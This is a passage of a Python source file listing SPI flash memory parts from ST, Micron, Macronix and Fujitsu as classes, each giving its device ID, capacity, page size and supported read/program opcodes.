    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class M25PE80(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x8014
    name = "m25pe80"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
# --- ST M25PX series ---
# Generated ID-table entries. The -s0/-s1 variants of the PX32 carry distinct
# device IDs (0x7316 / 0x6316) from the base 0x7116 part.
class M25PX16(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x7115
    name = "m25px16"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25PX32(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x7116
    name = "m25px32"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25PX32_S0(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x7316
    name = "m25px32-s0"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25PX32_S1(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x6316
    name = "m25px32-s1"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25PX64(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x7117
    name = "m25px64"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25PX80(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x7114
    name = "m25px80"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
# --- ST M45PE series (0x40xx device IDs) ---
# Generated ID-table entries; total_pages * page_size == total_size throughout.
class M45PE10(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x4011
    name = "m45pe10"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M45PE16(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x4015
    name = "m45pe16"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M45PE20(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x4012
    name = "m45pe20"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class M45PE40(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x4013
    name = "m45pe40"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class M45PE80(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x4014
    name = "m45pe80"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
# Non-NOR serial parts driven through the same SPI-flash protocol table.
# NOTE(review): m95m02 / mb85rs1mt are EEPROM/FRAM-class part numbers rather
# than NOR flash — confirm the generator source if this matters to callers.
class M95M02(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x0012
    name = "m95m02"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MB85RS1MT(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.FUJITSU
    device_id = 0x7f27
    name = "mb85rs1mt"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
# --- MR25H series ---
# All entries use manufacturer NONJEDEC / device_id 0x0000: these parts do not
# answer a JEDEC READ-ID, so they must be selected explicitly by name.
class MR25H10(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "mr25h10"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MR25H128(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "mr25h128"
    total_size = 16384 # bytes
    page_size = 256 # bytes
    total_pages = 64
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MR25H256(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "mr25h256"
    total_size = 32768 # bytes
    page_size = 256 # bytes
    total_pages = 128
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MR25H40(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "mr25h40"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
# --- MT25QL (3.0 V, 0xbaXX) / MT25QU (1.8 V, 0xbbXX) series ---
# Generated ID-table entries, listed under the ST manufacturer ID. For several
# capacities a short-name and a long-name class share the same device_id but
# advertise different opcode sets (e.g. mt25ql01 vs mt25ql01g); the *_4B
# opcodes are the 4-byte-address variants used on >16 MiB parts.
class MT25QL01(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba21
    name = "mt25ql01"
    total_size = 134217728 # bytes
    page_size = 256 # bytes
    total_pages = 524288
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MT25QL01G(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba21
    name = "mt25ql01g"
    total_size = 134217728 # bytes
    page_size = 256 # bytes
    total_pages = 524288
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MT25QL02(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba22
    name = "mt25ql02"
    total_size = 268435456 # bytes
    page_size = 256 # bytes
    total_pages = 1048576
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MT25QL02G(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba22
    name = "mt25ql02g"
    total_size = 268435456 # bytes
    page_size = 256 # bytes
    total_pages = 1048576
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MT25QL128(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba18
    name = "mt25ql128"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MT25QL256(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba19
    name = "mt25ql256"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MT25QL256A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba19
    name = "mt25ql256a"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
class MT25QL512(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba20
    name = "mt25ql512"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MT25QL512A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba20
    name = "mt25ql512a"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
class MT25QU01G(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb21
    name = "mt25qu01g"
    total_size = 134217728 # bytes
    page_size = 256 # bytes
    total_pages = 524288
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MT25QU02G(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb22
    name = "mt25qu02g"
    total_size = 268435456 # bytes
    page_size = 256 # bytes
    total_pages = 1048576
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MT25QU128(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb18
    name = "mt25qu128"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MT25QU256(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb19
    name = "mt25qu256"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MT25QU256A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb19
    name = "mt25qu256a"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
class MT25QU512(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb20
    name = "mt25qu512"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MT25QU512A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb20
    name = "mt25qu512a"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
# --- Micron MT35XU series ---
# Generated ID-table entries; these are the only parts here advertising the
# octal (x8) opcodes, in both 3-byte and 4-byte address forms.
class MT35XU02G(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MICRON
    device_id = 0x5b1c
    name = "mt35xu02g"
    total_size = 268435456 # bytes
    page_size = 256 # bytes
    total_pages = 1048576
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_8,
        SpiNorFlashOpCodes.PP_1_1_8,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_8_4B,
        SpiNorFlashOpCodes.PP_1_1_8_4B,
    ]
    dummy_bits = 8
class MT35XU512ABA(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MICRON
    device_id = 0x5b1a
    name = "mt35xu512aba"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_8,
        SpiNorFlashOpCodes.PP_1_1_8,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_8_4B,
        SpiNorFlashOpCodes.PP_1_1_8_4B,
    ]
    dummy_bits = 8
# --- Macronix MX23L series (0x05xx device IDs) ---
# Generated ID-table entries; total_pages * page_size == total_size throughout.
class MX23L12854(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x0518
    name = "mx23l12854"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX23L1654(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x0515
    name = "mx23l1654"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX23L3254(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x0516
    name = "mx23l3254"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX23L6454(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x0517
    name = "mx23l6454"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
# --- Macronix MX25L series ---
# Generated ID-table entries. Many die revisions (c/d/e/f suffixes) share a
# device_id and differ only in the opcode set advertised here; the 256-Mbit
# parts additionally expose 4-byte-address (*_4B) opcodes.
class MX25L1005(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2011
    name = "mx25l1005"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L1005C(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2011
    name = "mx25l1005c"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L1006E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2011
    name = "mx25l1006e"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L12805D(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2018
    name = "mx25l12805d"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class MX25L12835F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2018
    name = "mx25l12835f"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L12845(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2018
    name = "mx25l12845"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L12845E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2018
    name = "mx25l12845e"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L12855E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2618
    name = "mx25l12855e"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class MX25L12865E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2018
    name = "mx25l12865e"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L1605(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2015
    name = "mx25l1605"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L1605D(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2015
    name = "mx25l1605d"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L1606E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2015
    name = "mx25l1606e"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class MX25L1608D(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2015
    name = "mx25l1608d"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L1635D(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2415
    name = "mx25l1635d"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L1635E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2515
    name = "mx25l1635e"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L1673E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2015
    name = "mx25l1673e"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L2005(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2012
    name = "mx25l2005"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L2005A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2012
    name = "mx25l2005a"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class MX25L2005C(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2012
    name = "mx25l2005c"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
